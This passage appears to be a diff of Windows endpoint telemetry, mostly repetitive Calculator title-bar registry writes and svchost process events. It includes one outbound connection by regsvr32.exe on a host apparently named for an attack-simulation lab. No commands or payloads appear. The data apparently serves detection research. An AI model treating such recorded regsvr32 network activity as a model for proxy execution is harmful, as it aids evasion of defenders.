Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": 
"ButtonBackgroundColorInactive", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k appmodel -p -s camsvc", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 4052, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573250320000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": 
"ButtonPressedForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50505", + "subtype": "outgoing", + "timestamp": 131883573238680000, + 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
